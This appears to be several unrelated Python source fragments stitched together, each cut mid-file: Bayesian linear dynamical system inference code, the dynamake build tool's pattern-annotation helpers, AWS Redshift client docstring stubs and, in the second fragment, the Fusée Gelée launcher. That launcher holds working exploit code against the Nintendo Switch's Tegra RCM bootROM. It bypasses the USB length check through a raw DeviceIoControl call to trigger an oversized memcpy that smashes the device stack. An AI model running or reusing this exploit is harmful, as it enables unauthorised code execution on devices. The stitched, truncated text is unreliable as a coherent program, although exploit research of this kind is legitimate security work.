np.concatenate((np.transpose(E_x_uT, (0, 2, 1)), E_u_uT), axis=2)),
axis=1)
E_xut_xutT = E_xu_xuT[:-1].sum(0)
E_xtp1_xtp1T = E_x_xT[1:].sum(0)
E_xtp1_xtT = E_xtp1_xtT.sum(0)
E_xtp1_utT = (smoothed_mus[1:, :, None] * inputs[:-1, None, :]).sum(0)
E_xtp1_xutT = np.hstack((E_xtp1_xtT, E_xtp1_utT))
# def is_symmetric(A):
# return np.allclose(A, A.T)
# assert is_symmetric(E_xt_xtT)
# assert is_symmetric(E_xtp1_xtp1T)
self.E_dynamics_stats = np.array(
[E_xtp1_xtp1T, E_xtp1_xutT, E_xut_xutT, self.T - 1])
# Emission statistics
E_yyT = np.sum(data**2, axis=0) if self.diagonal_noise else data.T.dot(data)
E_yxT = data.T.dot(smoothed_mus)
E_yuT = data.T.dot(inputs)
E_yxuT = np.hstack((E_yxT, E_yuT))
self.E_emission_stats = objarray([E_yyT, E_yxuT, E_xu_xuT.sum(0), T])
######################
# algorithm mixins #
######################
class _LDSStatesGibbs(_LDSStates):
def resample(self, niter=1):
self.resample_gaussian_states()
def _init_gibbs_from_mf(self):
raise NotImplementedError # TODO
def resample_gaussian_states(self):
self._normalizer, self.gaussian_states = \
info_sample(*self.info_params)
class _LDSStatesMeanField(_LDSStates):
@property
def expected_info_dynamics_params(self):
J_pair_22, J_pair_21, J_pair_11, logdet_pair = \
self.dynamics_distn.meanfield_expectedstats()
# Compute E[B^T Q^{-1}] and E[B^T Q^{-1} A]
n = self.D_latent
E_Qinv = J_pair_22.copy("C")
E_AT_Qinv = (J_pair_21[:,:n].T).copy("C")
E_BT_Qinv = (J_pair_21[:,n:].T).copy("C")
E_AT_Qinv_A = J_pair_11[:n,:n].copy("C")
E_BT_Qinv_A = J_pair_11[n:,:n].copy("C")
E_BT_Qinv_B = J_pair_11[n:,n:].copy("C")
h_pair_1 = (-self.inputs[:-1].dot(E_BT_Qinv_A)).copy("C")
h_pair_2 = (self.inputs[:-1].dot(E_BT_Qinv)).copy("C")
log_Z_pair = 1./2 * logdet_pair * np.ones(self.T-1)
log_Z_pair -= self.D_latent / 2. * np.log(2 * np.pi)
log_Z_pair -= 1. / 2 * np.einsum('ij,ti,tj->t', E_BT_Qinv_B, self.inputs[:-1], self.inputs[:-1])
return E_AT_Qinv_A, -E_AT_Qinv, E_Qinv, h_pair_1, h_pair_2, log_Z_pair
@property
def expected_info_emission_params(self):
J_yy, J_yx, J_node, logdet_node = \
self.emission_distn.meanfield_expectedstats()
n = self.D_latent
E_Rinv = J_yy
E_Rinv_C = J_yx[:,:n].copy("C")
E_Rinv_D = J_yx[:,n:].copy("C")
E_CT_Rinv_C = (J_node[:n,:n]).copy("C")
E_DT_Rinv_C = (J_node[n:,:n]).copy("C")
E_DT_Rinv_D = (J_node[n:,n:]).copy("C")
h_node = self.data.dot(E_Rinv_C)
h_node -= self.inputs.dot(E_DT_Rinv_C)
log_Z_node = -self.D_emission / 2. * np.log(2 * np.pi) * np.ones(self.T)
log_Z_node += 1. / 2 * logdet_node
# E[(y-Du)^T R^{-1} (y-Du)]
log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', E_Rinv,
self.data, self.data)
log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', -2*E_Rinv_D,
self.data, self.inputs)
log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', E_DT_Rinv_D,
self.inputs, self.inputs)
return E_CT_Rinv_C, h_node, log_Z_node
@property
def expected_info_params(self):
return self.info_init_params + \
self.expected_info_dynamics_params + \
self.expected_info_emission_params
def meanfieldupdate(self):
self._mf_lds_normalizer, self.smoothed_mus, self.smoothed_sigmas, \
E_xtp1_xtT = info_E_step(*self.expected_info_params)
self._set_expected_stats(
self.smoothed_mus,self.smoothed_sigmas,E_xtp1_xtT)
def get_vlb(self):
return self._mf_lds_normalizer
def meanfield_smooth(self):
if self.diagonal_noise:
E_C, _, _, _ = self.emission_distn.mf_expectations
else:
ed = self.emission_distn
_,_,E_C,_ = ed._natural_to_standard(ed.mf_natural_hypparam)
return np.hstack((self.smoothed_mus, self.inputs)).dot(E_C.T)
####################
# states classes #
####################
class LDSStates(
_LDSStatesGibbs,
_LDSStatesMeanField):
pass
class LDSStatesMissingData(_LDSStatesGibbs, _LDSStatesMeanField):
def __init__(self, model, T=None, data=None, mask=None, **kwargs):
if mask is not None:
assert mask.shape == data.shape
self.mask = mask
elif (data is not None) and isinstance(data, np.ndarray):
if np.any(np.isnan(data)):
warn("data includes NaN's. Treating these as missing data.")
self.mask = ~np.isnan(data)
data[np.isnan(data)] = 0
else:
self.mask = np.ones_like(data, dtype=bool)
else:
self.mask = np.ones((T, model.emission_distn.D_out), dtype=bool)
super(LDSStatesMissingData, self).__init__(model, T=T, data=data, **kwargs)
@property
def info_emission_params(self):
if self.mask is None:
return super(LDSStatesMissingData, self).info_emission_params
if self.diagonal_noise:
return self._info_emission_params_diag
else:
return self._info_emission_params_dense
@property
def _info_emission_params_diag(self):
C, D = self.C, self.D
sigmasq = self.emission_distn.sigmasq_flat
J_obs = self.mask / sigmasq
centered_data = self.data - self.inputs.dot(D.T)
CCT = np.array([np.outer(cp, cp) for cp in C]).\
reshape((self.D_emission, self.D_latent ** 2))
J_node | |
actually significant, but it needs to be not None
"""
# Get a list of devices to use later
device_list = self.libk.KLST_HANDLE()
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_Init(ctypes.byref(device_list), 0)
if ret == 0:
raise ctypes.WinError()
# Get info for a device with that vendor ID and product ID
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_FindByVidPid(device_list, Vid, Pid, ctypes.byref(device_info))
self.lib.LstK_Free(ctypes.byref(device_list))
if device_info is None or ret == 0:
return None
# Populate function pointers for use with the driver our device uses (which should be libusbK)
self.dev = self.libk.KUSB_DRIVER_API()
ret = self.lib.LibK_LoadDriverAPI(ctypes.byref(self.dev), device_info.contents.DriverID)
if ret == 0:
raise ctypes.WinError()
# Initialize the driver for use with our device
self.handle = self.libk.KUSB_HANDLE(None)
ret = self.dev.Init(ctypes.byref(self.handle), device_info)
if ret == 0:
raise self.libk.WinError()
return self.dev
def read(self, length):
""" Read using libusbK """
# Create the buffer to store what we read
buffer = ctypes.create_string_buffer(length)
len_transferred = ctypes.c_uint(0)
# Call libusbK's ReadPipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.ReadPipe(self.handle, ctypes.c_ubyte(0x81), ctypes.addressof(buffer), ctypes.c_uint(length), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
return buffer.raw
def write_single_buffer(self, data):
""" Write using libusbK """
# Copy construct to a bytearray so we Know™ what type it is
buffer = bytearray(data)
# Convert wrap the data for use with ctypes
cbuffer = (ctypes.c_ubyte * len(buffer))(*buffer)
len_transferred = ctypes.c_uint(0)
# Call libusbK's WritePipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.WritePipe(self.handle, ctypes.c_ubyte(0x01), cbuffer, len(data), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
def ioctl(self, driver_handle: ctypes.c_void_p, ioctl_code: ctypes.c_ulong, input_bytes: ctypes.c_void_p, input_bytes_count: ctypes.c_size_t, output_bytes: ctypes.c_void_p, output_bytes_count: ctypes.c_size_t):
""" Wrapper for DeviceIoControl """
overlapped = self.libk.OVERLAPPED()
ctypes.memset(ctypes.addressof(overlapped), 0, ctypes.sizeof(overlapped))
ret = ctypes.windll.kernel32.DeviceIoControl(driver_handle, ioctl_code, input_bytes, input_bytes_count, output_bytes, output_bytes_count, None, ctypes.byref(overlapped))
# We expect this to error, which matches the others ^_^
if ret == False:
raise ctypes.WinError()
def trigger_vulnerability(self, length):
"""
Go over libusbK's head and get the master handle it's been using internally
and perform a direct DeviceIoControl call to the kernel to skip the length check
"""
# self.handle is KUSB_HANDLE, cast to KUSB_HANDLE_INTERNAL to transparent-ize it
internal = ctypes.cast(self.handle, ctypes.POINTER(self.libk.KUSB_HANDLE_INTERNAL))
# Get the handle libusbK has been secretly using in its ioctl calls this whole time
master_handle = internal.contents.Device.contents.MasterDeviceHandle
if master_handle is None or master_handle == self.libk.INVALID_HANDLE_VALUE:
raise ValueError("Failed to initialize master handle")
# the raw request struct is pretty annoying, so I'm just going to allocate enough memory and set the few fields I need
raw_request = ctypes.create_string_buffer(self.RAW_REQUEST_STRUCT_SIZE)
# set timeout to 1000 ms, timeout offset is 0 (since it's the first member), and it's an unsigned int
timeout_p = ctypes.cast(raw_request, ctypes.POINTER(ctypes.c_uint))
timeout_p.contents = ctypes.c_ulong(1000) # milliseconds
status_p = ctypes.cast(ctypes.byref(raw_request, 4), ctypes.POINTER(self.libk.status_t))
status_p.contents.index = self.GET_STATUS
status_p.contents.recipient = self.TO_ENDPOINT
buffer = ctypes.create_string_buffer(length)
code = self.win_ctrl_code(self.WINDOWS_FILE_DEVICE_UNKNOWN, self.LIBUSBK_FUNCTION_CODE_GET_STATUS, self.WINDOWS_METHOD_BUFFERED, self.WINDOWS_FILE_ANY_ACCESS)
ret = self.ioctl(master_handle, ctypes.c_ulong(code), raw_request, ctypes.c_size_t(24), buffer, ctypes.c_size_t(length))
if ret == False:
raise ctypes.WinError()
class RCMHax:
# Default to the Nintendo Switch RCM VID and PID.
DEFAULT_VID = 0x0955
DEFAULT_PID = 0x7321
# Exploit specifics
COPY_BUFFER_ADDRESSES = [0x40005000, 0x40009000] # The addresses of the DMA buffers we can trigger a copy _from_.
STACK_END = 0x40010000 # The address just after the end of the device's stack.
def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None, override_checks=False):
""" Set up our RCM hack connection."""
# The first write into the bootROM touches the lowbuffer.
self.current_buffer = 0
# Keep track of the total amount written.
self.total_written = 0
# Create a vulnerability backend for the given device.
try:
self.backend = HaxBackend.create_appropriate_backend(system_override=os_override, skip_checks=override_checks)
except IOError:
print("It doesn't look like we support your OS, currently. Sorry about that!\n")
sys.exit(-1)
# Grab a connection to the USB device itself.
self.dev = self._find_device(vid, pid)
# If we don't have a device...
if self.dev is None:
# ... and we're allowed to wait for one, wait indefinitely for one to appear...
if wait_for_device:
print("Waiting for a TegraRCM device to come online...")
while self.dev is None:
self.dev = self._find_device(vid, pid)
# ... or bail out.
else:
raise IOError("No TegraRCM device found?")
# Print any use-related warnings.
self.backend.print_warnings()
# Notify the user of which backend we're using.
print("Identified a {} system; setting up the appropriate backend.".format(self.backend.BACKEND_NAME))
def _find_device(self, vid=None, pid=None):
""" Attempts to get a connection to the RCM device with the given VID and PID. """
# Apply our default VID and PID if neither are provided...
vid = vid if vid else self.DEFAULT_VID
pid = pid if pid else self.DEFAULT_PID
# ... and use them to find a USB device.
return self.backend.find_device(vid, pid)
def read(self, length):
""" Reads data from the RCM protocol endpoint. """
return self.backend.read(length)
def write(self, data):
""" Writes data to the main RCM protocol endpoint. """
length = len(data)
packet_size = 0x1000
while length:
data_to_transmit = min(length, packet_size)
length -= data_to_transmit
chunk = data[:data_to_transmit]
data = data[data_to_transmit:]
self.write_single_buffer(chunk)
def write_single_buffer(self, data):
"""
Writes a single RCM buffer, which should be 0x1000 long.
The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
If it's not, send a ZLP.
"""
self._toggle_buffer()
return self.backend.write_single_buffer(data)
def _toggle_buffer(self):
"""
Toggles the active target buffer, paralleling the operation happening in
RCM on the X1 device.
"""
self.current_buffer = 1 - self.current_buffer
def get_current_buffer_address(self):
""" Returns the base address for the current copy. """
return self.COPY_BUFFER_ADDRESSES[self.current_buffer]
def read_device_id(self):
""" Reads the Device ID via RCM. Only valid at the start of the communication. """
return self.read(16)
def switch_to_highbuf(self):
""" Switches to the higher RCM buffer, reducing the amount that needs to be copied. """
if self.get_current_buffer_address() != self.COPY_BUFFER_ADDRESSES[1]:
self.write(b'\0' * 0x1000)
def trigger_controlled_memcpy(self, length=None):
""" Triggers the RCM vulnerability, causing it to make a signficantly-oversized memcpy. """
# Determine how much we'd need to transmit to smash the full stack.
if length is None:
length = self.STACK_END - self.get_current_buffer_address()
return self.backend.trigger_vulnerability(length)
def parse_usb_id(id):
""" Quick function to parse VID/PID arguments. """
return int(id, 16)
# Read our arguments.
parser = argparse.ArgumentParser(description='launcher for the fusee gelee exploit (by @ktemkin)')
parser.add_argument('payload', metavar='payload', type=str, help='ARM payload to be launched; should be linked at 0x40010000')
parser.add_argument('-w', dest='wait', action='store_true', help='wait for an RCM connection if one isn\'t present')
parser.add_argument('-V', metavar='vendor_id', dest='vid', type=parse_usb_id, default=None, help='overrides the TegraRCM vendor ID')
parser.add_argument('-P', metavar='product_id', dest='pid', type=parse_usb_id, default=None, help='overrides the TegraRCM product ID')
parser.add_argument('--override-os', metavar='platform', dest='platform', type=str, default=None, help='overrides the detected OS; for advanced users only')
parser.add_argument('--relocator', metavar='binary', dest='relocator', type=str, default="%s/intermezzo.bin" % os.path.dirname(os.path.abspath(__file__)), help='provides the path to the intermezzo relocation stub')
parser.add_argument('--override-checks', dest='skip_checks', action='store_true', help="don't check for a supported controller; useful if you've patched your EHCI driver")
parser.add_argument('--allow-failed-id', dest='permissive_id', action='store_true', help="continue even if reading the device's ID fails; useful for development but not for end users")
arguments = parser.parse_args()
# Expand out the payload path to handle any user-refrences.
payload_path = os.path.expanduser(arguments.payload)
if not os.path.isfile(payload_path):
print("Invalid payload path specified!")
sys.exit(-1)
# Find our intermezzo relocator...
intermezzo_path = os.path.expanduser(arguments.relocator)
if not os.path.isfile(intermezzo_path):
print("Could not find the intermezzo interposer. Did you build it?")
sys.exit(-1)
# Get a connection to our device.
try:
switch = RCMHax(wait_for_device=arguments.wait, vid=arguments.vid,
pid=arguments.pid, os_override=arguments.platform, override_checks=arguments.skip_checks)
except IOError as e:
print(e)
sys.exit(-1)
# Print the device's ID. Note that reading the device's ID is necessary to get it into
try:
device_id = switch.read_device_id()
print("Found a Tegra with Device ID: {}".format(device_id))
except OSError as e:
# Raise the exception only if we're not being permissive about ID reads.
if not arguments.permissive_id:
raise e
# Prefix the image with an RCM command, so it winds up loaded into memory
# at the right location (0x40010000).
# Use the maximum length accepted by RCM, so we can transmit as much payload as
# we want; we'll take over before we get to the end.
length = 0x30298
payload = length.to_bytes(4, byteorder='little')
# pad out to 680 so the payload starts at the right address in IRAM
payload += b'\0' * (680 - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
# Include the Intermezzo binary in the command stream. This | |
from each_string(*strings)
def flatten(*args: Strings) -> List[str]:
"""
Flatten an arbitrarily nested list of strings into a simple list for processing.
"""
return list(each_string(*args))
class AnnotatedStr(str):
"""
A wrapper containing optional annotations.
"""
#: Whether this was annotated by :py:func:`dynamake.optional`.
optional = False
#: Whether this was annotated by :py:func:`dynamake.phony`.
phony = False
#: Whether this was annotated by :py:func:`dynamake.exists`.
exists = False
#: Whether this was annotated by :py:func:`dynamake.precious`.
precious = False
def _dump_str(dumper: Dumper, data: AnnotatedStr) -> Node:
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
yaml.add_representer(AnnotatedStr, _dump_str)
def copy_annotations(source: str, target: str) -> str:
"""
Copy the annotations from one string to another.
Returns the annotated target string.
"""
if isinstance(source, AnnotatedStr):
if not isinstance(target, AnnotatedStr):
target = AnnotatedStr(target)
target.optional = source.optional
target.exists = source.exists
target.phony = source.phony
target.precious = source.precious
return target
def is_optional(string: str) -> bool:
"""
Whether a string has been annotated as :py:func:`dynamake.optional`.
"""
return isinstance(string, AnnotatedStr) and string.optional
def is_exists(string: str) -> bool:
"""
Whether a string has been annotated as :py:func:`dynamake.exists`-only.
"""
return isinstance(string, AnnotatedStr) and string.exists
def is_phony(string: str) -> bool:
"""
Whether a string has been annotated as :py:func:`dynamake.phony`.
"""
return isinstance(string, AnnotatedStr) and string.phony
def is_precious(string: str) -> bool:
"""
Whether a string has been annotated as :py:func:`dynamake.precious`.
"""
return isinstance(string, AnnotatedStr) and string.precious
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def fmt_capture(wildcards: Dict[str, Any], pattern: str) -> str:
...
@overload
def fmt_capture(wildcards: Dict[str, Any], not_pattern: NotString) -> List[str]:
...
@overload
def fmt_capture(wildcards: Dict[str, Any], first: Strings, second: Strings, *patterns: Strings) -> List[str]:
...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def fmt_capture(kwargs: Any, *patterns: Any) -> Any: # type: ignore
"""
Format one or more capture patterns using the specified values.
This is different from invoking ``pattern.format(**kwargs)`` on each pattern because ``format`` would be confused by
the ``{*name}`` captures in the pattern(s). In contrast, ``fmt_capture`` will expand such directives, as long as the
``name`` does not start with ``_``.
"""
results = [copy_annotations(pattern, _fmt_capture(kwargs, pattern)) for pattern in each_string(*patterns)]
if len(patterns) == 1 and isinstance(patterns[0], str):
assert len(results) == 1
return results[0]
return results
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def optional(pattern: str) -> str:
...
@overload
def optional(not_string: NotString) -> List[str]:
...
@overload
def optional(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def optional(*patterns: Any) -> Any: # type: ignore
"""
Annotate patterns as optional (for use in action ``input`` and/or ``output``).
An optional input is allowed not to exist before the action is executed. This is useful if the action responds to
the files but can execute without them.
An optional output is allowed not to exist after the action is executed. This is useful to ensure such outputs are
removed following a failed execution, or before a new execution.
"""
strings: List[str] = []
for pattern in each_string(*patterns):
if not isinstance(pattern, AnnotatedStr):
pattern = AnnotatedStr(pattern)
pattern.optional = True
strings.append(pattern)
if len(patterns) == 1 and isinstance(patterns[0], str):
assert len(strings) == 1
return strings[0]
return strings
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def exists(pattern: str) -> str:
...
@overload
def exists(not_string: NotString) -> List[str]:
...
@overload
def exists(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def exists(*patterns: Any) -> Any: # type: ignore
"""
Annotate patterns as exist-only (for use in action ``input`` and/or ``output``).
An exist-only input is only required to exist, but its modification date is ignored. Directories are always treated
this way because modification date on directories is unreliable.
An exist-only output is not touched following the execution, that is, the action ensures the file will exist, but
may choose to leave it unmodified.
"""
strings: List[str] = []
for pattern in each_string(*patterns):
if not isinstance(pattern, AnnotatedStr):
pattern = AnnotatedStr(pattern)
pattern.exists = True
strings.append(pattern)
if len(patterns) == 1 and isinstance(patterns[0], str):
assert len(strings) == 1
return strings[0]
return strings
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def phony(pattern: str) -> str:
...
@overload
def phony(not_string: NotString) -> List[str]:
...
@overload
def phony(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def phony(*patterns: Any) -> Any: # type: ignore
"""
Annotate patterns as phony (for use in action ``input`` and/or ``output``).
A phony target does not exist as a disk file. When required as an input, its producer step is always executed, and
the dependent step always executes its sub-processes.
"""
strings: List[str] = []
for pattern in each_string(*patterns):
if not isinstance(pattern, AnnotatedStr):
pattern = AnnotatedStr(pattern)
pattern.phony = True
strings.append(pattern)
if len(patterns) == 1 and isinstance(patterns[0], str):
assert len(strings) == 1
return strings[0]
return strings
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def precious(pattern: str) -> str:
...
@overload
def precious(not_string: NotString) -> List[str]:
...
@overload
def precious(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def precious(*patterns: Any) -> Any: # type: ignore
"""
Annotate patterns as precious (for use in action ``output``).
A precious output is never deleted. This covers both deletion of "stale" outputs before an action is run and
deletion of "failed" outputs after an action has failed.
"""
strings: List[str] = []
for pattern in each_string(*patterns):
if not isinstance(pattern, AnnotatedStr):
pattern = AnnotatedStr(pattern)
pattern.precious = True
strings.append(pattern)
if len(patterns) == 1 and isinstance(patterns[0], str):
assert len(strings) == 1
return strings[0]
return strings
class Captured:
"""
The results of operations using a capture pattern.
A capture pattern is similar to a glob pattern. However, all wildcard matches must be specified inside ``{...}`` as
follows:
* ``{*name}`` has the same effect as ``*``. The matching substring will be captured using the key ``name``.
* ``/{**name}/`` has the same effect as ``/**/``. The matching substring will be captured using the key ``name``.
If ``name`` starts with ``_`` then the matching substring will be discarded instead of being captured.
If ``name`` is followed by ``:``, it must be followed by the actual glob pattern. That is, ``{*name}`` is a
shorthand for ``{*name:*}`` and ``{**name}`` is shorthand for ``{*name:**}``. This allows using arbitrary match
patterns (for example ``{*digit:[0-9]}`` will capture a single decimal digit).
"""
def __init__(self) -> None:
"""
Create an empty capture results.
"""
#: The list of existing paths that matched the capture pattern.
self.paths: List[str] = []
#: The list of wildcard values captured from the matched paths.
self.wildcards: List[Dict[str, Any]] = []
class NonOptionalException(Exception):
"""
Exception when an non-optional pattern did not match any disk files.
"""
def __init__(self, glob: str, capture: str) -> None:
"""
Create a new exception when no disk files matched the pattern.
"""
if capture == glob:
super().__init__(f"No files matched the non-optional glob pattern: {glob}")
else:
super().__init__(f"No files matched the non-optional glob: {glob} pattern: {capture}")
#: The glob pattern that failed to match.
self.glob = glob
def glob_capture(*patterns: Strings) -> Captured:
"""
Given capture pattern, return the :py:class:`dynamake.Captured` information (paths and captured values).
**Parameters**
capture
The pattern may contain ``...{*captured_name}...``, as well as normal ``glob`` patterns (``*``, ``**``). The
``...{name}..`` is expanded using the provided ``wildcards``. The ``*`` and ``**`` are ``glob``-ed. A capture
expression will cause the matching substring to be collected in a list of dictionaries (one per matching
existing path name). Valid capture patterns are:
* ``...{*captured_name}...`` is treated as if it was a ``*`` glob pattern, and the matching zero or more
characters are entered into the dictionary under the ``captured_name`` key.
* ``...{*captured_name:pattern}...`` is similar but allows you to explicitly specify the glob pattern capture it
under the key ``foo``.
* ``...{**captured_name}...`` is a shorthand for ``...{*captured_name:**}...``. That is, it acts similarly to
``...{*captured_name}...`` except that the glob pattern is ``**``.
.. note::
Do not use the ``{*foo:**}`` form. There's some special treatment for the ``{**foo}`` form as it can expand
to the empty string. In particular, it is expected to always be used between ``/`` characters, as in
``.../{**foo}/...``, and may expand to either no directory name, a single directory name, or a sequence of
directory names.
If a pattern is not annotated with :py:func:`dynamake.optional` and it matches no existing files, an error is
raised.
**Returns**
Captured
The list of existing file paths that match the patterns, and the list of dictionaries with the captured values
for each such path. The annotations (:py:class:`dynamake.AnnotatedStr`) of the pattern are copied to the paths
expanded from | |
point for the next set of response records in a subsequent request. If a value is returned in a response, you can retrieve the next set of records by providing this returned marker value in the ``marker`` parameter and retrying the command. If the ``marker`` field is empty, all response records have been retrieved for the request.
:type ClusterIdentifier: string
:param ClusterIdentifier:
The unique identifier for the cluster whose snapshot schedules you want to view.
:type ScheduleIdentifier: string
:param ScheduleIdentifier:
A unique identifier for a snapshot schedule.
:type TagKeys: list
:param TagKeys:
The key value for a snapshot schedule tag.
- *(string) --*
:type TagValues: list
:param TagValues:
The value corresponding to the key of the snapshot schedule tag.
- *(string) --*
:type Marker: string
:param Marker:
A value that indicates the starting point for the next set of response records in a subsequent request. If a value is returned in a response, you can retrieve the next set of records by providing this returned marker value in the ``marker`` parameter and retrying the command. If the ``marker`` field is empty, all response records have been retrieved for the request.
:type MaxRecords: integer
:param MaxRecords:
The maximum number or response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned ``marker`` value.
:rtype: dict
:returns:
"""
pass
def describe_storage(self) -> Dict:
"""
Returns the total amount of snapshot usage and provisioned storage for a user in megabytes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeStorage>`_
**Request Syntax**
::
response = client.describe_storage()
**Response Syntax**
::
{
'TotalBackupSizeInMegaBytes': 123.0,
'TotalProvisionedStorageInMegaBytes': 123.0
}
**Response Structure**
- *(dict) --*
- **TotalBackupSizeInMegaBytes** *(float) --*
The total amount of storage currently used for snapshots.
- **TotalProvisionedStorageInMegaBytes** *(float) --*
The total amount of storage currently provisioned.
:rtype: dict
:returns:
"""
pass
def describe_table_restore_status(self, ClusterIdentifier: str = None, TableRestoreRequestId: str = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Lists the status of one or more table restore requests made using the RestoreTableFromClusterSnapshot API action. If you don't specify a value for the ``TableRestoreRequestId`` parameter, then ``DescribeTableRestoreStatus`` returns the status of all table restore requests ordered by the date and time of the request in ascending order. Otherwise ``DescribeTableRestoreStatus`` returns the status of the table specified by ``TableRestoreRequestId`` .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeTableRestoreStatus>`_
**Request Syntax**
::
response = client.describe_table_restore_status(
ClusterIdentifier='string',
TableRestoreRequestId='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'TableRestoreStatusDetails': [
{
'TableRestoreRequestId': 'string',
'Status': 'PENDING'|'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'CANCELED',
'Message': 'string',
'RequestTime': datetime(2015, 1, 1),
'ProgressInMegaBytes': 123,
'TotalDataInMegaBytes': 123,
'ClusterIdentifier': 'string',
'SnapshotIdentifier': 'string',
'SourceDatabaseName': 'string',
'SourceSchemaName': 'string',
'SourceTableName': 'string',
'TargetDatabaseName': 'string',
'TargetSchemaName': 'string',
'NewTableName': 'string'
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **TableRestoreStatusDetails** *(list) --*
A list of status details for one or more table restore requests.
- *(dict) --*
Describes the status of a RestoreTableFromClusterSnapshot operation.
- **TableRestoreRequestId** *(string) --*
The unique identifier for the table restore request.
- **Status** *(string) --*
A value that describes the current state of the table restore request.
Valid Values: ``SUCCEEDED`` , ``FAILED`` , ``CANCELED`` , ``PENDING`` , ``IN_PROGRESS``
- **Message** *(string) --*
A description of the status of the table restore request. Status values include ``SUCCEEDED`` , ``FAILED`` , ``CANCELED`` , ``PENDING`` , ``IN_PROGRESS`` .
- **RequestTime** *(datetime) --*
The time that the table restore request was made, in Universal Coordinated Time (UTC).
- **ProgressInMegaBytes** *(integer) --*
The amount of data restored to the new table so far, in megabytes (MB).
- **TotalDataInMegaBytes** *(integer) --*
The total amount of data to restore to the new table, in megabytes (MB).
- **ClusterIdentifier** *(string) --*
The identifier of the Amazon Redshift cluster that the table is being restored to.
- **SnapshotIdentifier** *(string) --*
The identifier of the snapshot that the table is being restored from.
- **SourceDatabaseName** *(string) --*
The name of the source database that contains the table being restored.
- **SourceSchemaName** *(string) --*
The name of the source schema that contains the table being restored.
- **SourceTableName** *(string) --*
The name of the source table being restored.
- **TargetDatabaseName** *(string) --*
The name of the database to restore the table to.
- **TargetSchemaName** *(string) --*
The name of the schema to restore the table to.
- **NewTableName** *(string) --*
The name of the table to create as a result of the table restore request.
- **Marker** *(string) --*
A pagination token that can be used in a subsequent DescribeTableRestoreStatus request.
:type ClusterIdentifier: string
:param ClusterIdentifier:
The Amazon Redshift cluster that the table is being restored to.
:type TableRestoreRequestId: string
:param TableRestoreRequestId:
The identifier of the table restore request to return status for. If you don\'t specify a ``TableRestoreRequestId`` value, then ``DescribeTableRestoreStatus`` returns the status of all in-progress table restore requests.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous ``DescribeTableRestoreStatus`` request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by the ``MaxRecords`` parameter.
:rtype: dict
:returns:
"""
pass
def describe_tags(self, ResourceName: str = None, ResourceType: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None) -> Dict:
"""
Returns a list of tags. You can return tags from a specific resource by specifying an ARN, or you can return all tags for a given type of resource, such as clusters, snapshots, and so on.
The following are limitations for ``DescribeTags`` :
* You cannot specify an ARN and a resource-type value together in the same request.
* You cannot use the ``MaxRecords`` and ``Marker`` parameters together with the ARN parameter.
* The ``MaxRecords`` parameter can be a range from 10 to 50 results to return in a request.
If you specify both tag keys and tag values in the same request, Amazon Redshift returns all resources that match any combination of the specified keys and values. For example, if you have ``owner`` and ``environment`` for tag keys, and ``admin`` and ``test`` for tag values, all resources that have any combination of those values are returned.
If both tag keys and values are omitted from the request, resources are returned regardless of whether they have tag keys or values associated with them.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeTags>`_
**Request Syntax**
::
response = client.describe_tags(
ResourceName='string',
ResourceType='string',
MaxRecords=123,
Marker='string',
TagKeys=[
'string',
],
TagValues=[
'string',
]
)
**Response Syntax**
::
{
'TaggedResources': [
{
'Tag': {
'Key': 'string',
'Value': 'string'
},
'ResourceName': 'string',
'ResourceType': 'string'
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **TaggedResources** *(list) --*
A list of tags with their associated resources.
- *(dict) --*
A tag and its associated resource.
- **Tag** *(dict) --*
The tag for the resource.
- **Key** *(string) --*
The key, or name, for the resource tag.
- **Value** *(string) --*
The value for the resource tag.
- **ResourceName** *(string) --*
The Amazon Resource Name (ARN) with which the tag is associated, for example: ``arn:aws:redshift:us-east-1:123456789:cluster:t1`` .
